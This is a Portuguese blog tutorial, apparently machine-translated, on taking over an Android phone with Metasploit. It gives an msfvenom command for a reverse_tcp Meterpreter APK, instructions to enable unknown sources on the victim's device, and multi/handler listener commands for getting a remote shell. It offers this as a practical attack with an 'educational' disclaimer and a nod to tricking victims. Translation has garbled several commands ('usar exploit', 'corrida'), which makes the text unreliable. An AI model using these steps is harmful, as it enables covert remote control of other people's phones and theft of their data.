Hackeando um smartphone Android

NB: Todas as informações contidas no artigo a seguir são apenas para fins educacionais, portanto, o autor não será responsabilizado pelo abuso de tais informações pelos usuários do site, se elas forem usadas para fins ilegais.

Nos guias anteriores do livro de endereços do Metasploit Framework , analisamos várias possibilidades de ação do software, concentrando-nos mais em ataques direcionados a PCs com Windows, exceto em alguns casos. Nos últimos anos, o mercado abriu suas portas para smartphones e tablets , dispositivos que rapidamente ganharam mais e mais popularidade, superando os pais de computadores acima de tudo com relação ao uso da rede.

Para um hacker, como para uma multinacional, deixar escapar essa fatia importante do mercado, seria ficar para trás com os tempos, sendo inevitavelmente destinado a sucumbir. É por esse motivo que neste tutorial eu quero re-propor o primeiro guia para o livro de endereços, revisitado em uma chave móvel .

O processo não difere muito do descrito acima, exceto por alguns passos em que a palavra Androidsubstituirá a palavra Windows.

Lembremo-nos de que, sendo puramente para fins de teste, este guia encontra muito poucas aplicações no mundo real. Além disso, em quantos você acha que eles podem iniciar um programa ou aplicativo que literalmente não serve para nada, se não para conceder acesso a estranhos ao seu dispositivo? A resposta a essa pergunta seria mais adequada para um ensaio sobre Engenharia Social do que sobre Exploração, então vamos nos concentrar em como obter acesso ao dispositivo móvel, e não em apropriação indébita da senha do Facebook do seu parceiro, sem esquecer o fato de que Uma vez que você tenha acesso remoto ao dispositivo, o resto será uma brisa.

Criar um apk infectado

Vamos começar criando um apk para instalar no dispositivo da vítima. Apk (Android Package) é a extensão que distingue os arquivos de aplicativos Android. Quanto aos executáveis do Windows, o Metasploit também fornece o módulo de criação de arquivos apk. Em seguida, digite no terminal ou msfconsole o seguinte comando, que retornará um arquivo apk, pronto para ser baixado e instalado no dispositivo vítima.

msfvenom -p androide / meterpreter / reverse_tcp LHOST = [ip_machine_attaching] LPORT = [porta_de_a_conexao] -o [nome do arquivo] .apk

Hacking Android Metasploit - Crie payloads de arquivos APK msfvenom

A carga está pronta, nós só temos que trazê-lo para o dispositivo móvel.

Ativar "Fontes desconhecidas" no Android

Aviso: o arquivo que contém a carga útil não está assinado, portanto, devemos desativar o controle das fontes de segurança para poder instalar o arquivo apk no dispositivo. Para fazer isso, vá para Configurações -> segurança e ative o item Fontes desconhecidas .

Definir o manipulador

Uma vez que o controle das fontes seguras no dispositivo foi desativado, iniciamos o msfconsole com o comando msfconsole e definimos um manipulador android genérico

usar exploit / multi / handler
definir PAYLOAD android / meterpreter / reverse_tcp
definir LHOST [ip_matting_attaching]
defina LPORT [port_for_the_connection]
corrida

Hacking Android Metasploit - Definir manipulador

Baixe e instale a carga útil

Vamos mover o dispositivo móvel, baixar o arquivo apk recém-criado e instalá-lo. Não tendo um dispositivo Android disponível, inclinei-me em uma máquina virtual.

Hacking Android Metasploit - Instalar apk

Sucesso !!

Assim que a vítima inicia o aplicativo chamado MainActivity, o smartphone ou tablet está sob nosso controle

Hackeando o Android Metasploit - Start MainActivity

Hacking Android Metasploit - Meterpreter sysinfo

Graças ao artigo do Baty !

Whatsapp

Manual de osint

Ache aqui

Open Source Intelligence Brasil